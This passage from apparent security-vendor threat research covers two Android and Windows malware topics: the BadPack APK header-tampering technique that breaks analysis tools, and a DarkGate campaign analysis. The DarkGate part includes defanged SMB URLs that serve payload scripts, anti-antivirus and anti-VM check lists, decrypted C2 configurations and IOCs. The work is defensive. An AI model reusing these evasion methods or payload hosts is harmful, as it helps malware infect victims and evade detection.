Step 2: The Compression method field in this header is numerically compared to see if it equals 8 (DEFLATE). If so, the Compressed size field in this header extracts the payload data.

Step 3: Otherwise, the payload data is assumed to only be STORE'd, requiring the Uncompressed size field in this header instead for extraction.

We can carry out the following two-part experiment to verify the code shown in the previous section truly handles the extracting and installing of an APK sample file onto an Android device:

Part One:

  1. Select an APK file whose "AndroidManifest.xml" payload data is actually compressed by the DEFLATE algorithm
  2. Install the APK file mentioned in Step 1 onto an Android device
  3. It will succeed with the following output message:

Part Two:

  1. Now, with the AndroidManifest.xml entry of the APK file:
    1. Go to the central directory file header
    2. Look for the Compression method field
    3. Modify its 2-byte little-endian integral value to 0 (STORE).
  2. It will now fail installation with the following output message, reporting the reason for failure as a "Corrupt XML binary file" error:

Manifestation of the BadPack Technique

Malware authors can manipulate an APK file using any of the three methods listed below. Corrections for recovery are highlighted in red.

Method 1: Specify the correct compression method STORE, but accompanied by an invalid compressed size.

This breaks analysis tools processing the APK sample file, but the Android device system runtime uses the Uncompressed size field from the central directory file header when the Compression method is STORE. An example is shown below.

SHA-256 hash:
0003445778b525bcb9d86b1651af6760da7a8f54a1d001c355a5d3ad915c94cb
Local File Header - Fields

Compression method = 0 (STORE)

Compressed size = 14417 41192

Uncompressed size = 41192

Data = \x00\x00\x08\x00 ...

Central Directory File Header - Fields

Compression method = 0 (STORE)

Compressed size = 14417 41192

Uncompressed size = 41192

Method 2: Specify any compression method value that is not DEFLATE, when the actual compression method of the payload is STORE.

This breaks analysis tools processing the APK sample file, but the Android device system runtime treats the unknown compression method as STORE and reads the Uncompressed size field from the central directory file header. An example is shown below.

SHA-256 hash:
015bd2e799049f5e474b80cbbdcd592ce4e2dfbfae183bada86a9b6ec103e25e
Local File Header - Fields

Compression method = 27941 0 (STORE)

Compressed size =6042 17264

Uncompressed size = 17264

Data = \x00\x00\x08\x00 ...

Central Directory File Header - Fields

Compression method = 38402 0 (STORE)

Compressed size = 6042 17264

Uncompressed size = 17264

Method 3: Specify any compression method value in the local file header only, when the actual compression method of the payload is DEFLATE.

This breaks analysis tools processing the APK sample file. However, the Android device system runtime only relies on the fields from the central directory file header to perform its extraction successfully. In this case, the compression method is correctly set as DEFLATE.

SHA-256 hash:
131135a7c911bd45db8801ca336fc051246280c90ae5dafc33e68499d8514761
Local File Header - Fields

Compression method = -2221 8 (DEFLATE)

Compressed size = 2254

Uncompressed size = 8380

Data = \xad\x58\x39\x73 ...

Central Directory File Header - Fields

Compression method = 8 (DEFLATE)

Compressed size = 2254

Uncompressed size = 8380

Android Malware Analysis Tools

This section highlights how the BadPack technique works as an anti-analysis evasion mechanism, focusing on how this manifests in file extractors and Android static analysis tools. Our example uses the APK malware sample with a SHA-256 hash of 90c41e52f5ac57b8bd056313063acadc753d44fb97c45c2dc58d4972fe9f9f21. This example uses Method 2 from BackPack techniques listed in the previous section.

7-Zip

The file archiver 7-Zip is unable to extract the AndroidManifest.xml file from the APK sample, citing the reason for failure as a "Headers Error" as shown in Figure 9 below.

Image 9 is a screenshot of many lines of code. Highlighted in a red box is the error code where the ZIP program failed to unpack the bundled APK sample.
Figure 9. 7-Zip failed to unpack the BadPack-bundled APK sample (command output created on CodeSnap).

Apktool

Advertised as "a powerful tool designed for reverse engineering Android applications," Apktool has the capability to decompile resources, recovering to as close to their original authored state as possible. It also allows users to modify the application before rebuilding it.

The error message "Invalid CEN header (bad compression method: 19466)" in Figure 10 below suggests that the APK sample may have been compressed using some nonstandard or proprietary compression method, which Apktool does not recognize.

Image 10 is a screenshot of many lines of code. Highlighted in a red box is the code that notes the failure to decompress the APK sample.
Figure 10. Apktool failed to decompress the APK sample (command output created on CodeSnap).

Jadx

Jadx is another popular reverse engineering tool for Android applications. When attempting to load the APK malware sample into Jadx, it produces the same error message as Apktool, as depicted in Figure 11.

Image 11 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where Jadex could not process the sample.
Figure 11. Jadx was unable to process the same APK sample (command output created on CodeSnap).

This error message clearly indicates that the APK sample has an issue with its specified compression method. This arises from its author intentionally changing the compression method field value.

JAR

Strictly speaking, an APK sample belongs to the Java ARchiver (JAR) file format specification because it contains the additional META-INF/MANIFEST.MF file on top of the standard ZIP file format requirements. Yet the Java Development Kit's JAR tool cannot extract the AndroidManifest.xml file. Figure 12 illustrates this.

Image 12 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where JAR could not extract the XML file. Invalid compression method.
Figure 12. Error message showing JAR cannot extract the AndroidManifest.xml file (command output created on CodeSnap).

Unzip

The error message "unsupported compression method 19466" shown in Figure 13 indicates that, while using the Unzip tool to decompress the APK sample, it does not support or recognize the compression method used for the AndroidManifest.xml file. This can occur if certain files within the archive are compressed using a nonstandard or proprietary compression method. All other files in the archive extract or inflate successfully without errors.

Image 13 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where the Unzip tool could not unpack the XML file. Unsupported compression method 19466.
Figure 13. The Unzip tool cannot unpack the AndroidManifest.xml file (command output created on CodeSnap).

Apksigner

Shipped with the official Android SDK, the Apksigner tool is often used to sign APK files and verify the signature. However, it fails to verify the signature of the BadPack-bundled APK sample. Figure 14 below shows the AndroidManifest.xml file could not be read due to obfuscation.

Image 14 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where Apksigner could not read the XML file. Data of entry AndroidManifest.xml malformed.
Figure 14. Apksigner failed to read AndroidManifest.xml (command output created on CodeSnap).

apkInspector

While researching this topic, we came across an open-source tool that was able to extract the AndroidManifest.xml file.

First released on Dec. 31, 2023, apkInspector is an open-source tool that provides detailed insights into the low-level ZIP structure of raw APK files. It can also extract APK content and even decode the AndroidManifest.xml file, since the original AndroidManifest.xml file is in a binary, non-human-readable format. We executed this on our APK sample and verified it is indeed capable of both extracting and decoding the AndroidManifest.xml file.

Figure 15 below shows that apkInspector was able to extract the AndroidManifest.xml. This is due to it possessing the capability to handle tampered DEFLATE or STORE compression methods, as seen in its Python code for extraction.

Image 15 is a screenshot of many lines of code. Highlighted in a red box is the line showing where the binary XML file was successfully extracted. “Extraction successful.”
Figure 15. apkInspector extracting binary AndroidManifest.xml at 17,244 bytes (command output created on CodeSnap).

Conclusion

The increasing number of Android devices present a growing target that poses a significant challenge in combating malware attacks on the platform. APK files using BadPack reflect the increasing sophistication of APK malware samples. This not only presents a formidable challenge for security analysts, but it also underscores the need for continuous development of innovative techniques and tools to identify and mitigate these threats.

People should be suspicious of Android applications requiring unusual permissions not aligned with their advertised functionality, like an Android flashlight app requesting permissions to access the device's phonebook. We recommend that people also refrain from installing applications that originate from third-party sources onto their devices.

Palo Alto Networks customers receive protection from BadPack APK samples through Next-Generation Firewall with our Cloud-Delivered Security Services, including Advanced WildFire, Advanced DNS Security and Advanced URL Filtering.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks reported these findings to Google. Based on Google’s current detection, no apps containing this malware are found on Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hashes of BadPack malware samples:

  • 0003445778b525bcb9d86b1651af6760da7a8f54a1d001c355a5d3ad915c94cb
  • 015bd2e799049f5e474b80cbbdcd592ce4e2dfbfae183bada86a9b6ec103e25e
  • 131135a7c911bd45db8801ca336fc051246280c90ae5dafc33e68499d8514761
  • 90c41e52f5ac57b8bd056313063acadc753d44fb97c45c2dc58d4972fe9f9f21

Additional Resources

Updated July  16, 2024, at 6:40 a.m. PT to update Figure 4. 

Updated July  17, 2024, at 6:20 a.m. PT to correct byte numbers in text. 

DarkGate: Dancing the Samba With Alluring Excel Files

Executive Summary

This article reviews a DarkGate malware campaign from March-April 2024 that uses Microsoft Excel files to download a malicious software package from public-facing SMB file shares. This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware.

First reported in 2018, DarkGate has evolved into a malware-as-a-service (MaaS) offering. We have seen a surge of DarkGate activity after the disruption of Qakbot infrastructure in August 2023.

Palo Alto Networks customers are better protected from DarkGate and other malware families through our Next-Generation Firewall with Cloud-Delivered Security Services that include Advanced WildFire, Advanced URL Filtering and Advanced Threat Prevention. Cortex XDR can block malicious samples. The Prisma Cloud Defender Agent can detect the malware files referenced in this article using signatures generated by Advanced WildFire products and protect cloud-based VMs.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics DarkGate, Sandbox

DarkGate Background

DarkGate is a malware family first documented by enSilo in 2018. At that time, this threat ran with an advanced command and control (C2) infrastructure staffed by human operators responding to notifications of newly infected machines that had contacted its C2 server.

DarkGate has since evolved to become a MaaS offering with a tightly controlled number of customers. DarkGate has advertised various capabilities including hidden virtual network computing (hVNC), remote code execution, cryptomining and reverse shell.

An account named RastaFarEye posts updates and project information about DarkGate on the underground cybercrime market in the Exploit.IN forum and the XSS.is forum. Figure 1 below shows an October 2023 post by RastaFarEye announcing fixes and features for DarkGate version 5.

Screenshot of a forum post by user RastaFarEye titled 'UPDATE' discussing various technical updates and bug fixes related to software. The post includes file download and scanner links, and an announcement about a discount on a product subscription.
Figure 1. Exploit.IN forum post by DarkGate developer RastaFarEye in October 2023. Source: Trellix.

DarkGate remained relatively under the radar until 2021. Our telemetry revealed a surge in DarkGate starting in September 2023 (shown in Figure 2), not too long after the multinational government disruption and takedown of Qakbot infrastructure in August 2023.

Bar graph displaying data over a period with dates on the horizontal axis ranging from August 1, 2023 to March 1, 2024 and a count on the vertical axis from 0 to 15. The bars show fluctuating values, peaking around November 2023.
Figure 2. Hits on DarkGate malware samples from our telemetry.

These campaigns use AutoIt or AutoHotkey scripts to infect victims with DarkGate. Our telemetry indicates this activity has been widespread across North America and Europe as well as significant portions of Asia.

As early as January 2024, DarkGate released its sixth major version, which was reported by Spamhaus as an updated sample that was identified as version 6.1.6.

Since August 2023, we have seen campaigns using various methods to distribute DarkGate malware, such as the following:

Starting in March 2024, we saw a campaign using servers running open Samba file shares hosting files used for DarkGate infections. Our analysis for this article focuses on this campaign, which ran from March-April of 2024.

Analysis of March-April 2024 Campaign

In March 2024, the actors behind DarkGate began a new campaign using Microsoft Excel (.xlsx) files, which mostly targeted North America in the beginning but slowly spread to Europe as well as parts of Asia. Our telemetry indicates some peaks of activity, with the standout on April 9, 2024, with almost 2,000 samples on that single day as shown below in Figure 3.

The image displays a bar chart tracking data from March 3, 2024 to April 28, 2024. There is a spike on April 9, 2024.
Figure 3. DarkGate malware samples from our telemetry from March through April 2024.

Initially, the files all had similar nomenclature, which was part of what made them suspicious. The URLs they were from were quite dissimilar, and the companies accessing them were as well.

Some popular names were:

  • paper<NUM>-<DD>-march-2024.xlsx
  • march-D<NUM>-2024.xlsx
  • ACH-<NUM>-<DD>March.xlsx
  • attach#<NUM>-<<DATE>.xlsx
  • 01 CT John Doe.xlsx (where John Doe is replaceable by any common English name)
  • april2024-<NUM>.xlsx
  • statapril2024-<<NUM>.xlsx

These names are designed to suggest something official/important.

If the user opens the .xlsx file in Excel, they are shown the template, pictured in Figure 4 below, that contains a linked object for the Open button.

Screenshot of Excel Online interface displaying a message about files from the cloud, with an 'Open' button to enable editing.
Figure 4. Template used by .xlsx files used in this DarkGate campaign.

When a user clicks the hyperlinked object for the Open button in the spreadsheet, it retrieves and runs content from a URL found in the spreadsheet archive's drawing.xml.rels file. This URL points to a Samba/SMB share that is publicly accessible and hosts a VBS file. An example is:

  • file:///\\167.99.115[.]33\share\EXCEL_OPEN_DOCUMENT.vbs

As the attack further evolved, the attackers also started sharing JS files from these Samba shares.

  • file:///\\5.180.24[.]155\azure\EXCEL_DOCUMENT_OPEN.JS..........

While the Microsoft Azure cloud service platform (CSP) is mentioned within the URL, there is no known connection between this malware and the Azure CSP. The threat actors could use this tactic to give the URL a sense of legitimacy and to avoid or obscure detection.

The EXCEL_OPEN_DOCUMENT.vbs file contains a large amount of junk code related to printer drivers, but the important script that retrieves and runs the follow-up PowerShell script is highlighted below in Figure 5.

A screenshot displaying a section of computer code in an IDE. The code includes error handling constructs in a programming language, with keywords like 'if', 'echo', 'set', and 'end if' prominently featured. Several lines are indenting for logical structure. The image shows a focus on generating and handling error messages with placeholders for user text and system descriptions. Several lines are highlighted in purple.
Figure 5. Section of code from EXCEL_OPEN_DOCUMENT.vbs with code to request and run the next stage PowerShell script highlighted in purple.

For Excel files with embedded objects that use Samba links to .js files instead of .vbs files, the JavaScript shows a similar function to retrieve and run the follow-up PowerShell script. Figure 6 shows a file named 11042024_1545_EXCEL_DOCUMENT_OPEN.js that performs this similar function.

Screenshot of computer code written in a programming environment. The code snippet features function definitions and script execution commands using PowerShell and ActiveXObject to perform web-based actions. The URI included in the script is "wassonsite dot com/yrqnsfla". The functions are named "wbbnrkg" and involve popup and run methods.
Figure 6. Section of code from a .js file to run the next-stage PowerShell script.

Code from the .vbs or .js file downloads and runs a PowerShell script. This PowerShell script downloads three files and uses them to start the AutoHotKey-based DarkGate package. An example is shown below in Figure 7.

Screenshot displaying a PowerShell script involving commands for changing directory, downloading files using Invoke-WebRequest, executing scripts, and modifying file attributes. The script includes URLs and file names like 'a.bin', 'script.ahk', and 'test.txt'.
Figure 7. PowerShell script to download and run the AutoHotKey-based DarkGate package.

In some cases, these PowerShell scripts attempt an interesting evasion tactic. Below in Figure 8, we find an example of a PowerShell script that checks if Kaspersky anti-malware software is installed by detecting if the directory C:/ProgramData/Kaspersky Lab exists. If this directory exists, the PowerShell script downloads the legitimate AutoHotKey.exe, possibly as an evasion tactic to avoid triggering Kaspersky anti-malware.

If C:/ProgramData/Kaspersky Lab does not exist, the PowerShell script downloads ASCII text representing hexadecimal code for Autohotkey.exe, saves the result as a.bin and uses certutil.exe with the -decodehex parameter to decode a.bin to the AutoHotKey.exe binary. Figure 8 shows details of this script.

Screenshot displaying a script. The script includes various command lines in PowerShell, focusing on web requests, file handling, and execution of an AutoHotkey script. The text editor has a dark background with colored syntax highlighting to differentiate commands, parameters, and strings. A large section is highlighted in purple.
Figure 8. PowerShell script to install DarkGate with the check for Kaspersky anti-malware software highlighted in purple.

We have also found similar checks and evasion techniques in AutoHotKey scripts (.ahk) and AutoIt3 scripts (.au3 or .a3x) in the DarkGate package.

The PowerShell script in Figures 7 and 8 both show a filename test.txt. This file is the final shellcode for DarkGate, but it is obfuscated. The legitimate Autohotkey.exe runs the malicious AutoHotKey script script.ahk, which deobfuscates the test.txt and loads it into memory to run as the DarkGate executable.

The script.ahk file has several comment lines with random English words that inflate the file to more than 50 KB. The functional AutoHotKey script is only 13 lines of code. Figure 9 below shows an example of this functional script.

The image displays a snippet of computer code. It involves memory operations with API calls such as "VirtualAlloc" and contains detailed parameters and function usage. The text mentions file manipulation, involving reading from a file "text.txt" located in the script directory. The image also includes explicit usage of data types like "UInt", "Char", and includes hexadecimal constants and operations. There is also an execution of a Dynamic Link Library (DLL) via "DllCall". The code is highlighted in syntax-coloring common in development environments, enhancing readability.
Figure 9. An example of script.ahk stripped of its comment lines.

A Closer Look at DarkGate Malware

Deobfuscated from test.txt and run from system memory, this final DarkGate binary is known for its complex mechanisms to avoid detection and malware analysis. By analyzing its shellcode, we can gain a deeper understanding of the malware's functionality and identify ways to counteract its anti-analysis techniques.

Checking CPU Information as an Anti-Analysis Technique

One of the anti-analysis techniques employed by DarkGate is identifying the CPU of the targeted system. This can reveal if the threat is running in a virtual environment or on a physical host, enabling DarkGate to cease operations to avoid being analyzed in a controlled environment.

Figure 10 shows the routine to check for a victim system's CPU when analyzing the final DarkGate executable in a debugger.

Screenshot of computer code in an IDE showing function calls and a highlighted text line displaying CPU specification: "Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz @ 2 Cores."
Figure 10. DarkGate's routine to check for the CPU shown in a debugger.

Detecting Multiple Anti-Malware Programs

In addition to checking CPU information, DarkGate malware also scans for multiple other anti-malware programs on the targeted system. By identifying installed anti-malware software, DarkGate can avoid triggering their detection mechanisms or even disable them to further evade analysis.

Table 1 lists the anti-malware programs and their corresponding directory paths or filenames, which DarkGate uses to detect their presence on a system.

Anti-Malware Brands Checks for Location (Directory) or Running Process (Filename)
Bitdefender C:\ProgramData\BitdefenderC:\Program Files\Bitdefender
SentinelOne C:\Program Files\SentinelOne
Avast C:\ProgramData\AVASTC:\Program Files\AVAST Software
AVG C:\ProgramData\AVG
C:\Program Files\AVG
Kaspersky C:\ProgramData\Kaspersky Lab
C:\Program Files (x86)\Kaspersky Lab
Eset-Nod32 C:\ProgramData\ESET
egui.exe  (ESET GUI)
Avira C:\Program Files (x86)\Avira
Norton ns.exe
nis.exe
nortonsecurity.exe
Symantec smc.exe
Trend Micro uiseagnt.exe
McAfee mcuicnt.exe
SUPERAntiSpyware superantispyware.exe
Comodo vkise.exe
cis.exe
Malwarebytes C:\Program Files\Malwarebytes
mbam.exe
ByteFence bytefence.exe
Search & Destroy sdscan.exe
360 Total Security  qhsafetray.exe
Total AV totalav.exe
IObit Malware Fighter C:\Program Files (x86)\IObit
Panda Security psuaservice.exe
Emsisoft C:\ProgramData\Emsisoft
Quick Heal C:\Program Files\Quick Heal
F-Secure C:\Program Files (x86)\F-Secure
Sophos C:\ProgramData\Sophos
G DATA C:\ProgramData\G DATA
Windows Defender C:\Program Files (x86)\Windows Defender

Table 1. Anti-malware programs and their directory paths.

As DarkGate has evolved, its developers have implemented updates to include new anti-malware checks, such as those for Windows Defender and SentinelOne. This demonstrates the malware's continuous evolution and adaptation to bypass the latest security measures.

Identifying Malware Analysis and Anti-VM Tools

DarkGate malware not only checks for CPU information and anti-malware programs but also scans the host's running processes. It does this to ensure normal Windows processes are running, but no processes that could be used for malware analysis or processes that indicate a virtual machine (VM) environment.

Unwanted processes can include popular reverse engineering tools, debuggers or virtualization software. Identifying these processes helps DarkGate take appropriate action to avoid detection or hinder analysis of the malware.

Figure 11 shows the output of a debugger from a DarkGate sample checking through running processes for VM-related programs or malware analysis tools. This reveals several strings that relate to normal Windows processes and others for VM environments and malware analysis tools. DarkGate checks for these on an infected host before proceeding with its infection activity.

Screen filled with hexadecimal code and corresponding ASCII text, showing various system processes like 'svchost.exe' and 'smsvchost.exe.'
Figure 11. Output from a debugger, revealing names of various processes identified by a DarkGate sample.

The list of active programs or processes that the DarkGate sample checked through (also in Figure 11) is shown below:

  • system
  • smss.exe
  • csrss.exe
  • wininit.exe
  • winlogon.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • dwm.exe
  • spoolsv.exe
  • VGAuthService.exe
  • Vm3dservice.exe (VMware process for video rendering)
  • Vmtoolsd.exe (VMware process for VMware tools)
  • MsMpEng.exe
  • dllhost.exe
  • WmiPrvSE.exe
  • sihost.exe
  • GoogleUpdate.exe
  • taskhostw.exe
  • RuntimeBroker.exe
  • explorer.exe
  • msdtc.exe
  • SearchIndexer.exe
  • ShellExperienceHost.exe
  • NisSrv.exe
  • OneDrive.exe
  • sedsvc.exe
  • X32dbg.exe (Debugging software)
  • Ida.exe (IDA binary code analysis tool)
  • ProcessHacker.exe (Process Hacker analysis tool)
  • notepad++.exe
  • OutputPE.exe
  • SearchUI.exe
  • audiodg.exe

Decryption of Configuration Data

After gathering information about the targeted system's hardware, anti-malware programs and running processes, DarkGate malware incorporates this data into its decryption routine for its configuration. This configuration consists of multiple fields, each containing specific information the malware uses to adapt its behavior and evade detection. By adjusting its actions based on the collected data, the malware can better avoid analysis and remain hidden on the infected system.

In the most recent versions of DarkGate, the function to decrypt the configuration receives the encrypted buffer, buffer size and a hard-coded XOR key as inputs. It then creates a new decryption key using the provided key and proceeds to decrypt the configuration buffer as shown in Figures 12 and 13.

Figure 12 shows the output of a debugger from a DarkGate sample first seen on March 14, 2024, after decrypting its configuration data.

The image displays a screen of densely packed hexadecimal codes interspersed with ASCII characters, indicative of a data dump or computer code analysis. The included text references URLs, data references, and various technical terms.
Figure 12. Configuration data extracted from a DarkGate sample first seen on March 14, 2024.

Figure 13 shows the output of a debugger from a DarkGate sample first seen on April 16, 2024, after decrypting its configuration data.

A screen filled with hexadecimal numerical values and scattered ASCII characters.
Figure 13. Configuration data extracted from a DarkGate sample first seen on April 16, 2024.

We recently analyzed the configurations from DarkGate malware samples from a variety of campaigns. The fields appear as numbers with no description, but additional research can correlate some of these fields to functions or values of the malware sample.

For example, the raw configuration data shows 25=admin888 in Figures 12 and 13, and further analysis indicates this admin888 is the campaign identifier for those malware samples.

In some cases, the meaning of these fields is not clear. For example, Figures 12 and 13 both reveal an entry labeled 14=Yes, but we have not confirmed the specific function or value of this entry.

Despite these unknown field values, the configuration data can reveal interesting details of DarkGate samples. For example, we found several different hard-coded XOR keys from samples using the same campaign identifier. And some samples with different XOR keys had not only the same campaign identifier, but also the same value for their C2 server.

The different XOR keys for samples with otherwise similar configuration characteristics could possibly be an attempt to hinder analysis of DarkGate samples.

Let's review some examples of configuration data illustrating notable differences in XOR keys. These values are shown in JSON format, so numbers for any unidentified fields are prefaced with the string flag_. For example, 14=Yes from the raw configuration data is shown as "flag_14": "Yes", in JSON format.

Same Campaign Identifier, Different XOR Keys

Table 2 shows the decrypted configuration comparing two samples from May 2024 in JSON format with the same campaign_id value but different xor_key values.

Configuration From DarkGate Sample Seen as Early as May 7, 2024  Configuration From DarkGate Sample Seen as Early as May 20, 2024 
"C2": "updateleft.com",  
"check_ram": false,  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": 6,  
"flag_14": true,  
"port": 80,  
"startup_persistence": true,  
"flag_32": false,  
"anti_vm": true,  
"min_disk": false,  
"min_disk_size": 100,  
"anti_analysis": true,  
"min_ram": false,  
"min_ram_size": 4096,  
"check_disk": false,  
"flag_21": false,  
"flag_22": false,  
"flag_23": true,  
"flag_31": false,  
"flag_24": ".newtarget",  
"campaign_id": "admin888",
"flag_26": false,  
"xor_key": "SbCjRKFB",  
"flag_28": false,  
"flag_29": 2 
"C2":"wear626.com",  
"flag_8": "No",  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": "6",  
"flag_14": "Yes",  
"port": "80",  
"startup_persistence": "No",  
"flag_32": "No",  
"check_display": "Yes",  
"check_disk": "No",  
"min_disk_size": "100",  
"check_ram": "No",  
"min_ram_size": "4096",  
"check_xeon": "No",  
"flag_21": "Yes",  
"flag_22": "No",  
"flag_23": "No",  
"flag_31": "No",  
"flag_24": "traf",  
"campaign_id": "admin888",  
"flag_26": "No",  
"xor_key": "TNduHZgm",  
"flag_28": "No",  
"flag_29": "2",  
"flag_34": "No"

Table 2. Configuration comparison from two DarkGate samples with the same campaign identifier but different hard-coded XOR keys.

Same Campaign Identifier and C2 Server, Different XOR Keys

Table 3 shows the decrypted configuration comparing two samples from April 2024 in JSON format with the same C2 and campaign_id values but different xor_key values.

Configuration From DarkGate Sample Seen As Early as April 10, 2024 Configuration From DarkGate Sample Seen As Early as April 27, 2024 
"C2":"78.142.18.222",  
"flag_8": "No",  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": "6",  
"flag_14": "Yes",  
"port": "80",  
"startup_persistence": "No",  
"flag_32": "No",  
"check_display": "No",  
"check_disk": "No",  
"min_disk_size": "100",  
"check_ram": "No",  
"min_ram_size": "4096",  
"check_xeon": "No",  
"flag_21": "Yes",  
"flag_22": "No",  
"flag_23": "No",  
"flag_31": "No",  
"campaign_id": "tompang,  
"flag_26": "No",  
"xor_key": "ClUqWMEv",
"flag_28": "No",  
"flag_29": "6",  
"flag_33": "No" 
"C2":"78.142.18.222",  
"flag_8": "No",  
"crypter_rawstub": "DarkGate",  
"crypter_dll": "R0ijS0qCVITtS0e6xeZ",  
"crypter_au3": "6",  
"flag_14": "Yes",  
"port": "80",  
"startup_persistence": "No",  
"flag_32": "No",  
"check_display": "No",  
"check_disk": "No",  
"min_disk_size": "100",  
"check_ram": "No",  
"min_ram_size": "4096",  
"check_xeon": "No",  
"flag_21": "Yes",  
"flag_22": "No",  
"flag_23": "No",  
"flag_31": "No",  
"campaign_id": "tompang",  
"flag_26": "No",  
"xor_key": "VzJaSPos",  
"flag_28": "No",  
"flag_29": "2"

Table 3. Configuration comparison from two DarkGate samples with the same campaign identifier and the same C2 server but different hard-coded XOR keys.

DarkGate C2 Traffic

DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text. Figure 14 shows the initial HTTP POST request for C2 traffic from a DarkGate infection on March 14, 2024.

A screenshot of Wireshark software displaying an HTTP stream, capturing and showing detailed network packet data with various headers and hexadecimal values visible on the screen.
Figure 14. Text stream of the initial HTTP POST request from a DarkGate infection on March 14, 2024.

This Base64-encoded text can be decoded, but the result is further obfuscated. Other research reveals how this data can be fully deobfuscated.

In our infection run March 14, 2024, we saw what appears to have been data exfiltration in five HTTP POST requests sending nearly 218 KB of data as shown below in Figure 15.

The image shows a screenshot of a network traffic log from Wireshark displayed in a table format. The columns are labeled from left to right as Time, ID, Dot, port, Host, Content-Length, and Info. The rows list different network exchanges with entries detailing timestamps in 'YYYY-MM-DD hh:mm:ss' format, various IP addresses under 'Dot', port numbers, and the domain 'nextroundstr.com' under 'Host'. All the traffic requests are POST requests shown under the 'Info' column. Some rows feature black arrows pointing to the right, indicating specific entries highlighted within the log.
Figure 15. HTTP POST requests for DarkGate C2 traffic filtered in Wireshark, showing possible data exfiltration.

When reviewing a text stream of the traffic, this possible data exfiltration also shows as Base64-encoded text sent over HTTP POST requests. Figure 16 shows one such example from the infection from March 14, 2024.

A screenshot of Wireshark software displaying an HTTP stream, capturing and showing detailed network packet data with various headers and hexadecimal values visible on the screen.
Figure 16. Text stream of an HTTP post sending approximately 218 KB of information for possible data exfiltration.

While we've seen indicators of data exfiltration from DarkGate C2 traffic, other sources have reported follow-up malware from DarkGate like Danabot. Furthermore, threat actors reportedly using the DarkGate MaaS have previously been associated with ransomware activity.

Conclusion

DarkGate malware represents a significant and adaptable threat in the cybercrime ecosystem, possibly filling the gap left by the dismantlement of Qakbot after August 2023. With its multi-faceted attack vectors and evolution into a full-fledged MaaS offering, DarkGate demonstrates a high level of complexity and persistence.

Campaigns using this malware exhibit advanced infection techniques, leveraging both phishing strategies and approaches like exploiting publicly accessible Samba shares. As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.

Product Protection

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:

  • Cortex XDR blocks the DarkGate samples referenced in this post as well as the various stages and payloads, and it provides extensive protection through cloud-based static and dynamic analysis capabilities.
  • Next-Generation Firewall with Cloud-Delivered Security Services including Advanced WildFire, Advanced URL Filtering and Advanced Threat Prevention are able to recognize these domains or C2 URLs as malicious. They can also instrument the full attack chain and identify the malicious behaviors and anti-sandbox evasions. Examples of signatures include:
    • Virus/Win32.WGeneric.efigim
    • Virus/Win32.WGeneric.efypas
    • Virus/Win32.WGeneric.efhzig
  • Next Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signature: 86902.
  • The Prisma Cloud Defender Agent can detect the malware files referenced in this article using signatures generated by Advanced WildFire products and protect cloud-based VMs.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hashes for initial lures used in the March-April 2024 campaign distributing DarkGate malware:

SHA256 Hash File Description
378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7 XLSX file containing embedded object pointing to SMB URL hosting JS file
ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9 XLSX file containing embedded object pointing to SMB URL hosting VBS file
a01672db8b14a2018f760258cf3ba80cda6a19febbff8db29555f46592aedea6 XLSX file containing embedded object pointing to SMB URL hosting VBS file
02acf78048776cd52064a0adf3f7a061afb7418b3da21b793960de8a258faf29 XLSX file containing embedded object pointing to SMB URL hosting VBS file
2384abde79fae57568039ae33014184626a54409e38dee3cfb97c58c7f159e32  XLSX file containing embedded object pointing to SMB URL hosting VBS file
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503  XLSX file containing embedded object pointing to SMB URL hosting VBS file
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba  XLSX file containing embedded object pointing to SMB URL hosting VBS file
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503  XLSX file containing embedded object pointing to SMB URL hosting VBS file
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba  XLSX file containing embedded object pointing to SMB URL hosting VBS file
585e52757fe9d54a97ec67f4b2d82d81a547ec1bd402d609749ba10a24c9af53  XLSX file containing embedded object pointing to SMB URL hosting JS file
51f1d5d41e5f5f17084d390e026551bc4e9a001aeb04995aff1c3a8dbf2d2ff3  XLSX file containing embedded object pointing to SMB URL hosting JS file
